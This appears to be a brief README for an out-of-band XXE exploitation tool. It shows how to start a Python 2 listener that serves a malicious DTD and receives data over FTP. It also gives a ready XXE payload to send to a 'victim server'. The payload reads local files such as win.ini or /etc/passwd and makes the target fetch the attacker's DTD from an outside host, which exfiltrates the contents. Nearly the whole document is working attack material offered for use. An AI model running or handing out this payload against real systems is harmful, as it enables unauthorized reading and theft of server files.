xxe oob receive file via web and ftp server
run script:
python2 xxe-ftp-server.py public-ip-address web-port ftp-portsuch as:
python2 xxe-ftp-server.py 1.1.1.1 80 2121
send xxe payload to victim server:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://1.1.1.1:80/data.dtd"> %dtd;
]>
<data>&send;</data>c:/windows/win.ini is read file path,such as etc/passwd
1.1.1.1:80 is public-server-ip and web-bind-port